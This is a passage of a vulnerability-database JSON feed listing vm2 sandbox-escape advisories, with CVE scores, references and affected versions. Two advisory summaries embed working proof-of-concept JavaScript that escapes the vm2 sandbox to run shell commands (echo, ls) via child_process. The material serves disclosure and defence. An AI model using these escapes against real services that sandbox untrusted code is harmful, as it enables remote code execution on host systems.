","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44006"},{"reference_url":"https://github.com/advisories/GHSA-qcp4-v2jj-fjx8","reference_id":"GHSA-qcp4-v2jj-fjx8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qcp4-v2jj-fjx8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44006","GHSA-qcp4-v2jj-fjx8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ej5b-1m7b-hkf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61341?format=json","v
ulnerability_id":"VCID-f2j1-dxbm-sfgc","summary":"vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26332.json","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26332.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26332","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25152","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25266","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25249","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25199","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25142","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26332"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0"},{"reference_url":"https://
github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f"},{"reference_url":"https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca"},{"reference_url":"https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_eleme
nts":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T19:06:32Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T19:06:32Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26332","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26332"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466508","reference_id":"2466508","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466508"},{"reference_url":"https://github.com/advisories/GHSA-55hx-c926-fr95","reference_id":"GHSA-55hx-c926-fr95","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-55hx-c926-fr95"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerabl
ecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-26332","GHSA-55hx-c926-fr95"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f2j1-dxbm-sfgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49851?format=json","vulnerability_id":"VCID-gqm5-bhj5-k3cf","summary":"vm2 has a Sandbox Escape\nIn vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.\n\n```js\nconst { VM } = require(\"vm2\");\n\nconst code = `\nconst error = new Error();\nerror.name = Symbol();\nconst f = async () => error.stack;\nconst promise = f();\npromise.catch(e => {\nconst Error = e.constructor;\nconst Function = Error.constructor;\nconst f = new Function(\n\"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })\"\n);\nf();\n});\n`;\n\nnew VM().run(code);\n```\n\nIn lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. 
The return value of async functions is `globalPromise` object.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22709","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1728","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17184","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17165","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17245","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17284","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22709"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-27T21:42:17Z/"}],"url":"https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_
elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-27T21:42:17Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22709","reference_id":"CVE-2026-22709","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22709"},{"reference_url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-27T21:42:17Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73623?format=json","purl":"pkg:npm/vm2@3.10.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-py
e1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.2"}],"aliases":["CVE-2026-22709","GHSA-99p7-6v5w-7xg8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gqm5-bhj5-k3cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92107?format=json","vulnerability_id":"VCID-gqum-k4dn-fbe7","summary":"vm2 Access to Host Object Enables Sandbox Escape\n### Summary\n\nIt is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.\n\n### Details\n\nThere are various ways to use the host `Object`, to escape the sandbox, one example would be using  `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`\n\n### PoC\n\n```js\nconst g = {}.__lookupGetter__;\nconst a = Buffer.apply;\nconst p = a.apply(g, [Buffer, ['__proto__']]);\nconst o = p.call(p.call(a));\nconst HObject = o.constructor;\nsym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);\n\nconst obj = {\n\t[sym]: (depth, opt, inspect) => {\n\t\tinspect.constructor(\"return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})\")();\n\t},\n\tvalueOf: undefined,\n\tconstructor: undefined,\n};\n\nWebAssembly.compileStreaming(obj).catch(() => {});\n```\n\n### Impact\n\nSandbox Escape -> 
RCE","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43997","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0639","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06352","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06345","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06408","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06398","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43997"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Trac
k*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-13T18:39:53Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43997","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43997"},{"reference_url":"https://github.com/advisories/GHSA-47x8-96vw-5wg6","reference_id":"GHSA-47x8-96vw-5wg6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-47x8-96vw-5wg6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-43997","GHSA-47x8-96vw-5wg6"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gqum-k4dn-fbe7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44966?format=json","vulnerability_id":"VCID-hhxv-v932-cuf7","summary":"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\nvm2 is a sandbox that can run untrusted code with allow listed Node's built-in modules. 
There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-30547.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-30547.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30547","reference_id":"","reference_type":"","scores":[{"value":"0.83683","scoring_system":"epss","scoring_elements":"0.99307","published_at":"2026-06-09T12:55:00Z"},{"value":"0.84615","scoring_system":"epss","scoring_elements":"0.99349","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30547"},{"reference_url":"https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://gith
ub.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b22e87b102d97d45d112a0931dba1aef7eea049","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://github.com/patriksimek/vm2/commit/4b22e87b102d97d45d112a0931dba1aef7eea049"},{"reference_url":"https://github.com/patriksimek/vm2/commit/f3db4dee4d76b19869df05ba7880d638a880edd5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://github.com/patriksimek/vm2/commit/f3db4dee4d76b19869df05ba7880d638a880edd5"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.17","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.17"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187608","reference_id":"2187608","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187608"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30547","reference_id":"CVE-2023-30547","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elem
ents":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30547"},{"reference_url":"https://github.com/advisories/GHSA-ch3r-j5x3-6q2m","reference_id":"GHSA-ch3r-j5x3-6q2m","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ch3r-j5x3-6q2m"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ch3r-j5x3-6q2m","reference_id":"GHSA-ch3r-j5x3-6q2m","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ch3r-j5x3-6q2m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64745?format=json","purl":"pkg:npm/vm2@3.9.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCI
D-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.17"}],"aliases":["CVE-2023-30547","GHSA-ch3r-j5x3-6q2m"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hhxv-v932-cuf7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/101763?format=json","vulnerability_id":"VCID-jv3n-721k-z3h7","summary":"vm2: Sandbox Escape in vm2","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-36067.json","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-36067.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36067","reference_id":"","reference_type":"","scores":[{"value":"0.84468","scoring_system":"epss","scoring_elements":"0.99343","published_at":"2026-06-09T12:55:00Z"},{"value":"0.84468","scoring_system":"epss","scoring_elements":"0.99341","published_at":"2026-06-04T12:55:00Z"},{"value":"0.84468","scoring_system":"epss","scoring_elements":"0.99342","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36067"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/P
R:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164"},{"reference_url":"https://github.com/patriksimek/vm2/issues/467","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025